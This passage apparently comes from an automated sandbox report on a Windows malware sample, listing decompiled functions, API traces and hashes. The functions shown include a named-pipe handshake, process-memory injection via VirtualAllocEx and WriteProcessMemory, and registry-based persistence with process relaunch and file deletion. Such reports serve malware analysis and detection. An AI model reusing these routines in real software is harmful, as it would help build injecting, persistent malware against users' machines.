					if(E00403F8C(_t67,  &_v12, 4, _v8, 0x7d0) == 0 || _v12 != (_v16 >> 2) + _v16) {
						CloseHandle(_t67);
						goto L11;
					} else {
						_v12 = _v12 + (_v12 >> 2);
						E00403F18(_t67,  &_v12, 4, _v8, 0x7d0);
						_v28 = 1;
						_t73 = 0xc;
						_v24 = 1;
						E00403F18(_t67,  &_v28, 8, _v8, 0x7d0);
						_t74 = E0040EBCC(_t73);
						 *_t74 = 0x5e;
						 *((intOrPtr*)(_t74 + 4)) = 2;
						if(_a4 != 0) {
							 *(_t74 + 8) =  *(_t74 + 8) & 0x00000000;
							 *0x41215a =  *0x41215a + 1;
						} else {
							 *(_t74 + 8) = 1;
						}
						E00403F18(_t67, _t74, _v24, _v8, 0x7d0);
						E0040EC2E(_t74);
						E00403F8C(_t67,  &_v12, 4, _v8, 0x7d0);
						CloseHandle(_v8);
						CloseHandle(_t67);
						_t40 = 0 | _a4 == 0x00000000;
						goto L12;
					}
				}
				return _t35 | 0xffffffff;
			}

0x00404280
0x00404290
0x00404296
0x0040429b
0x004042b1
0x004042ba
0x004043c1
0x004043c4
0x004043ca
0x004043cd
0x00000000
0x004043ce
0x004042c0
0x004042c3
0x004042c8
0x00000000
0x00000000
0x004042dc
0x004042e6
0x00404300
0x004043bb
0x00000000
0x00404318
0x00404322
0x0040432c
0x00404333
0x00404336
0x00404342
0x00404345
0x00404350
0x00404359
0x0040435f
0x00404366
0x00404371
0x00404375
0x00404368
0x00404368
0x00404368
0x00404384
0x0040438a
0x0040439a
0x004043ab
0x004043ae
0x004043b5
0x00000000
0x004043b5
0x00404300
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,004098FD,00000001,00000100,004122F8,0040A3C7), ref: 00404290
CloseHandle.KERNEL32(0040A3C7), ref: 004043AB
CloseHandle.KERNEL32(00000001), ref: 004043AE

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseHandle$CreateEvent
String ID:
API String ID: 1371578007-0
Opcode ID: 0dd57ba844ed6ccee3cc7ff792ca289a65d044fd43fa66271c948426b094db86
Instruction ID: 580dd723e2696739ab8c529274da47b2bc3b4765397f1bbb4cd5042057411b76
Opcode Fuzzy Hash: 0dd57ba844ed6ccee3cc7ff792ca289a65d044fd43fa66271c948426b094db86
Instruction Fuzzy Hash: F94181B1900209BADB109BA2CD45F9FBFBCEF40355F104566F614B21C1D7789A51DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00404000, Relevance: 4.5, APIs: 3, Instructions: 35
sleepfileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404000(CHAR* _a4, signed int* _a8) {
				void* _t3;
				long _t6;
				void* _t8;
				signed int* _t9;

				_t9 = _a8;
				_t8 = 0;
				 *_t9 =  *_t9 | 0xffffffff;
				while(1) {
					_t3 = CreateFileA(_a4, 0xc0000000, 3, 0, 3, 0x40000080, 0); // executed
					if(_t3 != 0xffffffff) {
						break;
					}
					_t6 = GetLastError();
					if(_t6 == 2 || _t6 == 3) {
						L6:
						return 0;
					} else {
						if(_t6 == 5) {
							L9:
							return 1;
						}
						Sleep(0x1f4);
						_t8 = _t8 + 1;
						if(_t8 < 0xa) {
							continue;
						}
						goto L6;
					}
				}
				 *_t9 = _t3;
				goto L9;
			}

APIs

CreateFileA.KERNELBASE(40000080,C0000000,00000003,00000000,00000003,40000080,00000000,00000001,004122F8,004042B6,00000000,00000001,004122F8,00000000,?,004098FD), ref: 00404021
GetLastError.KERNEL32(?,004098FD,00000001,00000100,004122F8,0040A3C7), ref: 0040402C
Sleep.KERNEL32(000001F4,?,004098FD,00000001,00000100,004122F8,0040A3C7), ref: 00404046

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateErrorFileLastSleep
String ID:
API String ID: 408151869-0
Opcode ID: 6f680220710ad79833a0587a74a8d4d803d4b32c880204d479e51cf724750932
Instruction ID: 3804347f6bd7ba573f3b83e06e35dce69dd086f5e0a34025cfebbc3953b0dfe0
Opcode Fuzzy Hash: 6f680220710ad79833a0587a74a8d4d803d4b32c880204d479e51cf724750932
Instruction Fuzzy Hash: 05F0A771240101AAD7311B24BC49B5B36A1DBC6734F258B76F3B5F21E0C67458C19B1D

Uniqueness

Uniqueness Score: -1.00%

Function 0040EC54, Relevance: 4.5, APIs: 3, Instructions: 24
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040EC54() {
				long _v8;
				struct _FILETIME _v16;
				signed int _t11;

				GetSystemTimeAsFileTime( &_v16);
				GetVolumeInformationA(0, 0, 4,  &_v8, 0, 0, 0, 0); // executed
				_t11 = (GetTickCount() ^ _v16.dwHighDateTime ^ _v8) & 0x7fffffff;
				 *0x4136cc = _t11;
				return _t11;
			}

0x0040ec5e
0x0040ec72
0x0040ec84
0x0040ec89
0x0040ec8f

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 0040EC5E
GetVolumeInformationA.KERNELBASE(00000000,00000000,00000004,?,00000000,00000000,00000000,00000000), ref: 0040EC72
GetTickCount.KERNEL32 ref: 0040EC78

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Time$CountFileInformationSystemTickVolume
String ID:
API String ID: 1209300637-0
Opcode ID: 317f96d9bc7de3e67904a91eb6120da1bd741d4a36fd8a43a77db32c5f55538a
Instruction ID: 1673bc13977c8672636575d9c8a2f9c2942a42ce341afdc75306ae3be589e196
Opcode Fuzzy Hash: 317f96d9bc7de3e67904a91eb6120da1bd741d4a36fd8a43a77db32c5f55538a
Instruction Fuzzy Hash: 6BE0BFF5810104FFEB11EBB0EC4EEBB7BBCFB08315F504661B915D6090DAB49A448B64

Uniqueness

Uniqueness Score: -1.00%

Function 00406E36, Relevance: 3.1, APIs: 2, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406E36(intOrPtr _a4, intOrPtr _a8) {
				long _v8;
				long _v12;
				union _SID_NAME_USE _v16;
				intOrPtr _v60;
				intOrPtr _v76;
				void _v84;
				short _v340;
				short _v860;
				int _t20;
				int _t28;
				intOrPtr _t30;
				signed int _t31;
				signed int _t32;

				_t32 = _t31 | 0xffffffff;
				_v8 = 0x104;
				_t20 = GetUserNameW( &_v860,  &_v8); // executed
				if(_t20 != 0) {
					_v8 = 0x7c;
					_v12 = 0x80;
					_t28 = LookupAccountNameW(0,  &_v860,  &_v84,  &_v8,  &_v340,  &_v12,  &_v16); // executed
					if(_t28 != 0) {
						if(_v8 < 0xc || _v76 != _a4) {
							L8:
							_t32 = 1;
						} else {
							_t30 = _a8;
							if(_t30 == 0 || _v8 >= 0x1c && _v60 == _t30) {
								_t32 = 0;
							} else {
								goto L8;
							}
						}
					}
				}
				return _t32;
			}

0x00406e4b
0x00406e4e
0x00406e55
0x00406e5d
0x00406e7f
0x00406e86
0x00406e8d
0x00406e95
0x00406e9b
0x00406ebb
0x00406ebd
0x00406ea5
0x00406ea5
0x00406eaa
0x00406eb7
0x00000000
0x00000000
0x00000000
0x00406eaa
0x00406e9b
0x00406e95
0x00406ec2

APIs

GetUserNameW.ADVAPI32(?,00401FA1), ref: 00406E55
LookupAccountNameW.ADVAPI32(00000000,?,?,00000104,?,00000000,00000012), ref: 00406E8D

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Name$AccountLookupUser
String ID:
API String ID: 2370142434-0
Opcode ID: 72898ebcb6f81f1198030622a9bf6313c93c94cde1355ae2af79125b690e915f
Instruction ID: d69833bf2c7126fc9b7bd4b1d5117f4fe90a033eeaed535c4400ab00b2689cfd
Opcode Fuzzy Hash: 72898ebcb6f81f1198030622a9bf6313c93c94cde1355ae2af79125b690e915f
Instruction Fuzzy Hash: 0211F776900218EBDF21CFD4C884ADFB7BCAB04741F1542B6E502F6290DB749B989BE4

Uniqueness

Uniqueness Score: -1.00%

Function 02160DF8, Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE(00000400,?,?,02160223,?,?), ref: 02160E02
SetErrorMode.KERNELBASE(00000000,?,?,02160223,?,?), ref: 02160E07

Memory Dump Source

Source File: 0000000E.00000002.665832793.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 1c1e956acec762cf637877e972a5c5719258d3a4a55dd2059483f5d00c4a180a
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: CAD0123114512C77D7002AD4DC0DBDD7B1C9F05B6BF108051FB0DD9181C770995046E5

Uniqueness

Uniqueness Score: -1.00%

Function 00406DC2, Relevance: 1.5, APIs: 1, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406DC2(void* __ecx) {
				char _v261;
				char _v264;
				long _t6;
				intOrPtr* _t10;
				int _t13;
				intOrPtr _t20;
				void* _t21;

				_t6 =  *0x412f0c; // 0xc6a9b8fb
				if(_t6 == 0) {
					E0040EF00( &_v264, E00406CC9(__ecx));
					_t10 =  &_v264;
					_t21 = _t10 + 1;
					do {
						_t20 =  *_t10;
						_t10 = _t10 + 1;
					} while (_t20 != 0);
					if(_t10 - _t21 < 3) {
						L5:
						 *0x412f0c = 0x5e5e5e5e;
					} else {
						_v261 = 0;
						_t13 = GetVolumeInformationA( &_v264, 0, 0, 0x412f0c, 0, 0, 0, 0); // executed
						if(_t13 == 0) {
							goto L5;
						}
					}
					_t6 =  *0x412f0c; // 0xc6a9b8fb
				}
				return _t6;
			}

APIs

Part of subcall function 00406CC9: GetModuleHandleA.KERNEL32(kernel32,GetSystemWow64DirectoryA,004122F8,000000E4,00406DDC,000000C8), ref: 00406CE7
Part of subcall function 00406CC9: GetProcAddress.KERNEL32(00000000), ref: 00406CEE
Part of subcall function 00406CC9: GetSystemDirectoryA.KERNEL32 ref: 00406D14
Part of subcall function 00406CC9: GetWindowsDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104,?,00000000), ref: 00406D2B

GetVolumeInformationA.KERNELBASE(?,00000000,00000000,00412F0C,00000000,00000000,00000000,00000000,000000C8), ref: 00406E1A

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Directory$AddressHandleInformationModuleProcSystemVolumeWindows
String ID:
API String ID: 1823874839-0
Opcode ID: 5af76653529245223ce54de3b2201f43486e795cc7c2b0fcdaec7285886f4086
Instruction ID: 937aca74520052d45988c2d0c0f169875d4d0bc257a2eacc80ff7e120b8985ce
Opcode Fuzzy Hash: 5af76653529245223ce54de3b2201f43486e795cc7c2b0fcdaec7285886f4086
Instruction Fuzzy Hash: 75F0C2B6104218AFD710DB64EDC4EE777EED714308F1084B6E286E3145D6B89DA85B6C

Uniqueness

Uniqueness Score: -1.00%

Function 00409892, Relevance: 1.5, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409892(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _t6;
				int _t7;
				signed int _t8;

				_t6 = _a4;
				 *0x413398 = _t6;
				 *0x41339c = 0 | _t6 != 0x00000002;
				 *0x4133a0 = _a8;
				 *0x4133ac = _a12;
				if(_t6 == 4 || _t6 == 1) {
					 *0x4133a8 =  *0x4133a8 & 0x00000000;
				} else {
					_t8 =  *0x41204c; // 0x2
					 *0x41204c =  *0x41204c + 1;
					 *0x4133a8 = _t8;
				}
				_t7 = SetServiceStatus( *0x413390, 0x413394); // executed
				return _t7;
			}

0x00409892
0x0040989e
0x004098a3
0x004098ad
0x004098b7
0x004098c0
0x004098d9
0x004098c7
0x004098c7
0x004098cc
0x004098d2
0x004098d2
0x004098eb
0x004098f1

APIs

SetServiceStatus.SECHOST(00413394), ref: 004098EB

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ServiceStatus
String ID:
API String ID: 3969395364-0
Opcode ID: ed568b8bb23c32db7e8f15f5619feefc651b0b7a3ef30a3dcb983adc29e58fc0
Instruction ID: dd676a4af3dd8f9e000b524091363a81fd6157f1888c947a943bd607f736cbf1
Opcode Fuzzy Hash: ed568b8bb23c32db7e8f15f5619feefc651b0b7a3ef30a3dcb983adc29e58fc0
Instruction Fuzzy Hash: 02F0F271514208EFCB18CF14E89869A7BA0F348706B20C83EE82AD2371CB749A80DF0D

Uniqueness

Uniqueness Score: -1.00%

Function 02160920, Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(000000FF,00000000), ref: 02160929

Memory Dump Source

Source File: 0000000E.00000002.665832793.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false

Yara matches

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 97ba61691119ac6c143e35c22e187454724cf2f5840cc222c11bd32825f4c7c2
Instruction ID: 81cc2d85be0b363c656950924f38b6f44aec89e449adb5a9cb9224a94380d57e
Opcode Fuzzy Hash: 97ba61691119ac6c143e35c22e187454724cf2f5840cc222c11bd32825f4c7c2
Instruction Fuzzy Hash: 8B90047034415C11DD3435DC0C11F0501015745774F3007317130DD1D4DC4055003315

Uniqueness

Uniqueness Score: -1.00%

Function 004098F2, Relevance: 1.3, APIs: 1, Instructions: 37
sleepCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E004098F2(void* __ecx) {
				void* _t1;
				void* _t4;
				void* _t5;
				void* _t6;
				void* _t7;
				void* _t15;

				_t5 = __ecx;
				_t6 = 0;
				while(1) {
					_t1 = E00404280(_t5, 1); // executed
					_t7 = _t1;
					_pop(_t5);
					if(_t7 != 0) {
						break;
					}
					Sleep(0x3e8);
					_t6 = _t6 + 1;
					if(_t6 < 0xa) {
						continue;
					} else {
						_t15 = _t7;
					}
					break;
				}
				if(_t15 < 0) {
					_push(0);
					 *0x41201f = 1;
					E0040977C(_t5, E00402544(0x4122f8,  &E0041090C, 0xc, 0xe4, 0xc8)); // executed
					_t4 = E0040EE2A(_t5, 0x4122f8, 0, 0x100);
					 *0x41201f = 0;
					return _t4;
				}
				return _t1;
			}

0x004098f2
0x004098f4
0x004098f6
0x004098f8
0x004098fd
0x004098ff
0x00409902
0x00000000
0x00000000
0x00409909
0x0040990f
0x00409913
0x00000000
0x00409915
0x00409915
0x00409915
0x00000000
0x00409913
0x00409917
0x00409919
0x00409932
0x00409942
0x0040994f
0x00409957
0x00000000
0x00409957
0x00409960

APIs

Part of subcall function 00404280: CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,00000000,?,004098FD,00000001,00000100,004122F8,0040A3C7), ref: 00404290

Sleep.KERNEL32(000003E8,00000100,004122F8,0040A3C7), ref: 00409909

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateEventSleep
String ID:
API String ID: 3100162736-0
Opcode ID: b519fac338c9443ee715708201ed4027055a12a6fa8e9d9e71545faadc63bfc7
Instruction ID: e56085e6bf9507d1b9c0d1fa6774ae3e34a200a1ca8b69066151cd7271dcc025
Opcode Fuzzy Hash: b519fac338c9443ee715708201ed4027055a12a6fa8e9d9e71545faadc63bfc7
Instruction Fuzzy Hash: 58F05472A81360A6E62226566C07F8F19040B95B24F05417EF744BA2C395E8495141ED

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040405E, Relevance: 16.7, APIs: 11, Instructions: 203
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E0040405E(void* __ecx) {
				unsigned int _v8;
				unsigned int _v12;
				void* _v16;
				void* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v40;
				void* _t40;
				void* _t43;
				void* _t49;
				void* _t56;
				void* _t62;
				void* _t64;
				long _t71;
				void* _t82;
				void* _t92;
				void* _t93;
				void* _t95;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t103;
				void* _t104;

				_t95 = __ecx;
				_v8 = 0;
				_t40 = CreateEventA(0, 1, 1, 0);
				_v16 = _t40;
				if(_t40 != 0) {
					_t43 = E00404000(E00403ECD(_t95),  &_v20);
					_t97 = _t98;
					_t102 = 0x7d0;
					_t92 = 0x100;
					_t99 = 0x4122f8;
					if(_t43 == 0) {
						L10:
						E0040EE2A(_t97, _t99, 0, _t92);
						_t104 = _t103 + 0xc;
						_t93 = 0xa;
						while(1) {
							_t93 = _t93 - 1;
							_t99 = CreateNamedPipeA(E00403ECD(_t97), 0x40000003, 0, 0xff, 0x64, 0x64, 0x64, 0);
							if(_t99 != 0xffffffff) {
								break;
							}
							Sleep(0x1f4);
							if(_t93 != 0) {
								continue;
							}
							CloseHandle(_v16);
							return 0;
						}
						L14:
						while(1) {
							do {
								L14:
								while(1) {
									do {
										if(ConnectNamedPipe(_t99, 0) != 0) {
											goto L16;
										}
										_t71 = GetLastError();
										asm("sbb eax, eax");
										if( ~(_t71 - 0x217) + 1 == 0) {
											L25:
											DisconnectNamedPipe(_t99);
											continue;
										}
										L16:
										_t49 = E00403F8C(_t99,  &_v12, 4, _v16, _t102);
										_t104 = _t104 + 0x14;
									} while (_t49 == 0);
									_t92 = _v16;
									_v8 = (_v12 >> 2) + _v12;
									E00403F18(_t99,  &_v8, 4, _t92, _t102);
									_t56 = E00403F8C(_t99,  &_v12, 4, _t92, _t102);
									_t104 = _t104 + 0x28;
									if(_t56 == 0 || _v12 != (_v8 >> 2) + _v8) {
										goto L25;
									} else {
										_t62 = E00403F8C(_t99,  &_v28, 8, _t92, _t102);
										_t104 = _t104 + 0x14;
										if(_t62 == 0 || _v24 != 0xc) {
											goto L25;
										} else {
											_t64 = E00403F8C(_t99,  &_v40, 0xc, _t92, _t102);
											_t104 = _t104 + 0x14;
											if(_t64 == 0) {
												goto L25;
											}
											break;
										}
									}
								}
							} while (_v28 != 1);
							E00403F18(_t99,  &_v8, 4, _t92, _t102);
							_t103 = _t104 + 0x14;
							if(_v32 == 0) {
								_t102 = CloseHandle;
								CloseHandle(_t99);
								CloseHandle(_t92);
								E0040E318();
								L8:
								ExitProcess(0);
							}
							 *0x41215a =  *0x41215a + 1;
						}
					}
					E0040EE2A(_t97, 0x4122f8, 0, 0x100);
					_t103 = _t103 + 0xc;
					if(_v20 == 0xffffffff) {
						goto L10;
					}
					_v12 = E0040ECA5();
					E00403F18(_v20,  &_v12, 4, _v16, 0x7d0);
					_t82 = E00403F8C(_v20,  &_v8, 4, _v16, 0x7d0);
					_t103 = _t103 + 0x28;
					if(_t82 == 0 || _v8 != (_v12 >> 2) + _v12) {
						CloseHandle(_v20);
						goto L10;
					} else {
						_v8 = _v8 + (_v8 >> 2);
						E00403F18(_v20,  &_v8, 4, _v16, 0x7d0);
						_t103 = _t103 + 0x14;
						goto L8;
					}
				}
				return 0;
			}

0x0040405e
0x0040406d
0x00404070
0x00404076
0x0040407b
0x00404090
0x00404096
0x00404097
0x0040409c
0x004040a1
0x004040a8
0x00404130
0x00404134
0x00404139
0x0040413e
0x0040413f
0x00404153
0x00404160
0x00404165
0x00000000
0x00000000
0x0040416c
0x00404174
0x00000000
0x00000000
0x00404179
0x00000000
0x00404182
0x00000000
0x00404188
0x00404188
0x00000000
0x00404188
0x00404188
0x00404193
0x00000000
0x00000000
0x00404195
0x004041a2
0x004041a5
0x0040425e
0x0040425f
0x00000000
0x0040425f
0x004041ab
0x004041b6
0x004041bb
0x004041be
0x004041c5
0x004041d0
0x004041da
0x004041e8
0x004041ed
0x004041f2
0x00000000
0x00404202
0x0040420b
0x00404210
0x00404215
0x00000000
0x0040421d
0x00404226
0x0040422b
0x00404230
0x00000000
0x00000000
0x00000000
0x00404230
0x00404215
0x004041f2
0x00404232
0x00404245
0x0040424a
0x00404251
0x0040426a
0x00404271
0x00404274
0x00404276
0x0040411f
0x00404121
0x00404121
0x00404253
0x00404253
0x00404188
0x004040b2
0x004040b7
0x004040be
0x00000000
0x00000000
0x004040c9
0x004040d5
0x004040e7
0x004040ec
0x004040f1
0x0040412a
0x00000000
0x00404101
0x0040410b
0x00404117
0x0040411c
0x00000000
0x0040411c
0x004040f1
0x00000000

APIs

CreateEventA.KERNEL32(00000000,00000001,00000001,00000000), ref: 00404070
ExitProcess.KERNEL32 ref: 00404121

Memory Dump Source

Source File: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateEventExitProcess
String ID:
API String ID: 2404124870-0
Opcode ID: ecdf59d793d742e7872ece16c3f2b9a8eabc219a589cb6fa6f12b524e62dd379
Instruction ID: 074d9bb49edb1fcb374f0917b5464843becdd4ef2bd88426a03fabb40598a920
Opcode Fuzzy Hash: ecdf59d793d742e7872ece16c3f2b9a8eabc219a589cb6fa6f12b524e62dd379
Instruction Fuzzy Hash: 3C5192B1E00209BAEB10ABA19D45FFF7A7CEB54755F00007AFB04B61C1E7798A41C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 021665CC, Relevance: 6.1, APIs: 4, Instructions: 67memoryinjectionCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 021665DF
VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 021665F9
VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000040), ref: 0216661A
WriteProcessMemory.KERNEL32(00000000,00000000,?,?,00000000), ref: 0216663B

Memory Dump Source

Source File: 0000000E.00000002.665832793.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false

Yara matches

Similarity

API ID: AllocVirtual$HandleMemoryModuleProcessWrite
String ID:
API String ID: 1965334864-0
Opcode ID: f6d5bfc494c97751726a91e8fcfc29ef8439432d9fc6ff92f654e37a29c1b935
Instruction ID: de3fe794fed7733fca09195e82a409e1bc486407b99a18a03355eecbf4b18c4b
Opcode Fuzzy Hash: f6d5bfc494c97751726a91e8fcfc29ef8439432d9fc6ff92f654e37a29c1b935
Instruction Fuzzy Hash: 6F119171640258BFDB214F65EC49FAF3FACEB047A9F018024F909A6290D7B5DD108AA4

Uniqueness

Uniqueness Score: -1.00%

Function 02169E89, Relevance: 59.9, APIs: 28, Strings: 6, Instructions: 421stringregistryfileCOMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32 ref: 02169E56
lstrcpy.KERNEL32(?,00000000), ref: 02169FCA
lstrcat.KERNEL32(?,?), ref: 02169FDB
lstrcat.KERNEL32(?,0041070C), ref: 02169FED
GetFileAttributesExA.KERNEL32(?,?,?), ref: 0216A03D
DeleteFileA.KERNEL32(?), ref: 0216A088
GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,000001F4), ref: 0216A0BF
lstrcpy.KERNEL32 ref: 0216A118
lstrlen.KERNEL32(00000022), ref: 0216A125
GetTempPathA.KERNEL32(000001F4,?), ref: 02169EFC

Part of subcall function 02167012: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00412F0C,00000000,00000000,00000000,00000000), ref: 0216706A

Part of subcall function 02166F19: GetModuleHandleA.KERNEL32(00410380,00410670,00000000,\\.\pipe\hhzzhxuz,0216702C), ref: 02166F37
Part of subcall function 02166F19: GetProcAddress.KERNEL32(00000000), ref: 02166F3E
Part of subcall function 02166F19: GetSystemDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104), ref: 02166F64
Part of subcall function 02166F19: GetWindowsDirectoryA.KERNEL32(C:\Windows\SysWOW64\,00000104,?,00000000), ref: 02166F7B

RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,?,00000103,?,?,?,?), ref: 0216A18B
RegSetValueExA.ADVAPI32(?,00000001,?,00000001,?,000001F5,?,?,?,00000103,?,?,?,?), ref: 0216A1AE
GetModuleHandleA.KERNEL32(?,?,00000104,?,?,00000010,?,?,00000044,?,?,?,?,?,?,00000103), ref: 0216A1FD
GetModuleFileNameA.KERNEL32(00000000,?,?,00000104,?,?,00000010,?,?,00000044), ref: 0216A204
GetDriveTypeA.KERNEL32(?), ref: 0216A24E
lstrcat.KERNEL32(?,00000000), ref: 0216A288
lstrcat.KERNEL32(?,00410A34), ref: 0216A2AE
lstrcat.KERNEL32(?,00000022), ref: 0216A2C2
lstrcat.KERNEL32(?,00410A34), ref: 0216A2DD
wsprintfA.USER32 ref: 0216A306
lstrcat.KERNEL32(?,00000000), ref: 0216A32E
lstrcat.KERNEL32(?,?), ref: 0216A34D
CreateProcessA.KERNEL32(?,?,?,?,?,08000000,?,?,?,?,?,?,00000104,?,?,00000010), ref: 0216A370
DeleteFileA.KERNEL32(?,?,?,?,?,?,08000000,?,?,?,?,?,?,00000104,?), ref: 0216A381
RegCloseKey.ADVAPI32(?,?,00000001,?,000001F5,?,?,?,00000103,?,?,?,?), ref: 0216A1BA

Part of subcall function 0216994F: RegOpenKeyExA.ADVAPI32(80000001,00000000), ref: 02169986
Part of subcall function 0216994F: RegDeleteValueA.ADVAPI32(?,00000000), ref: 021699A6
Part of subcall function 0216994F: RegCloseKey.ADVAPI32(?), ref: 021699AF

GetModuleHandleA.KERNEL32(?,?,0000012C), ref: 0216A3C4
GetModuleFileNameA.KERNEL32(00000000,?,?,0000012C), ref: 0216A3CB
GetDriveTypeA.KERNEL32(00000022), ref: 0216A406

Strings

", xrefs: 0216A2C8
", xrefs: 0216A12B
", xrefs: 0216A3D9
\, xrefs: 02169F5C
P, xrefs: 02169FFA
D, xrefs: 0216A1DE

Memory Dump Source

Source File: 0000000E.00000002.665832793.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false

Yara matches

Similarity

API ID: lstrcat$FileModule$DeleteHandle$CloseDirectoryDriveNameOpenProcessTypeValuelstrcpy$AddressAttributesCreateEnvironmentExitInformationPathProcSystemTempVariableVolumeWindowslstrlenwsprintf
String ID: "$"$"$D$P$\
API String ID: 1653845638-2605685093
Opcode ID: a74de3c049da4994236323125331ee39a65e9fa08751685f19aaa480ac9d9ddf
Instruction ID: 6cbd7be66a75dbac1e31631ac4a9c2b0784a3d483a7404ef4ebeff7d976e5aae
Opcode Fuzzy Hash: a74de3c049da4994236323125331ee39a65e9fa08751685f19aaa480ac9d9ddf
Instruction Fuzzy Hash: 59F141B1C80259AFDB11DBA09C4CFFF7BBDAF09304F1484A6E609E2041E7758A958F64

Uniqueness

Uniqueness Score: -1.00%

Function 00401000, Relevance: 56.2, APIs: 16, Strings: 16, Instructions: 170
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401000() {
				struct HINSTANCE__* _t2;
				_Unknown_base(*)()* _t3;
				signed int _t4;
				struct HINSTANCE__* _t5;
				_Unknown_base(*)()* _t6;
				_Unknown_base(*)()* _t7;
				_Unknown_base(*)()* _t8;
				struct HINSTANCE__* _t9;
				_Unknown_base(*)()* _t10;
				_Unknown_base(*)()* _t11;
				_Unknown_base(*)()* _t12;
				struct HINSTANCE__* _t13;
				_Unknown_base(*)()* _t14;
				_Unknown_base(*)()* _t15;
				_Unknown_base(*)()* _t16;
				struct HINSTANCE__* _t17;
				_Unknown_base(*)()* _t18;
				_Unknown_base(*)()* _t19;
				_Unknown_base(*)()* _t20;
				struct HINSTANCE__* _t21;
				_Unknown_base(*)()* _t22;
				_Unknown_base(*)()* _t23;
				struct HINSTANCE__* _t25;
				struct HINSTANCE__* _t26;
				struct HINSTANCE__* _t27;
				struct HINSTANCE__* _t28;
				struct HINSTANCE__* _t29;
				struct HINSTANCE__* _t30;
				struct HINSTANCE__* _t31;
				struct HINSTANCE__* _t32;
				struct HINSTANCE__* _t33;
				signed int _t34;
				signed int _t35;

				_t2 =  *0x413918; // 0x0
				_t35 = _t34 | 0xffffffff;
				if(_t2 != 0) {
					L3:
					if( *0x41391c == 0 ||  *0x413920 == 0 ||  *0x413924 == 0 ||  *0x413928 == 0 ||  *0x41392c == 0 ||  *0x413930 == 0 ||  *0x413934 == 0 ||  *0x413938 == 0 ||  *0x41393c == 0 ||  *0x413940 == 0 ||  *0x413944 == 0 ||  *0x413948 == 0 ||  *0x41394c == 0 ||  *0x413950 == 0 ||  *0x413954 == 0) {
						_t3 = GetProcAddress(_t2, "RtlExpandEnvironmentStrings_U");
						 *0x41391c = _t3;
						if(_t3 == 0) {
							L34:
							_t4 = _t35;
						} else {
							_t5 =  *0x413918; // 0x0
							_t35 = 0xfffffffe;
							_t6 = GetProcAddress(_t5, "RtlSetLastWin32Error");
							 *0x413920 = _t6;
							if(_t6 == 0) {
								goto L34;
							} else {
								_t25 =  *0x413918; // 0x0
								_t35 = 0xfffffffd;
								_t7 = GetProcAddress(_t25, "NtTerminateProcess");
								 *0x413924 = _t7;
								if(_t7 == 0) {
									goto L34;
								} else {
									_t30 =  *0x413918; // 0x0
									_t35 = 0xfffffffc;
									_t8 = GetProcAddress(_t30, "RtlFreeSid");
									 *0x413928 = _t8;
									if(_t8 == 0) {
										goto L34;
									} else {
										_t9 =  *0x413918; // 0x0
										_t35 = 0xfffffffb;
										_t10 = GetProcAddress(_t9, "RtlInitUnicodeString");
										 *0x41392c = _t10;
										if(_t10 == 0) {
											goto L34;
										} else {
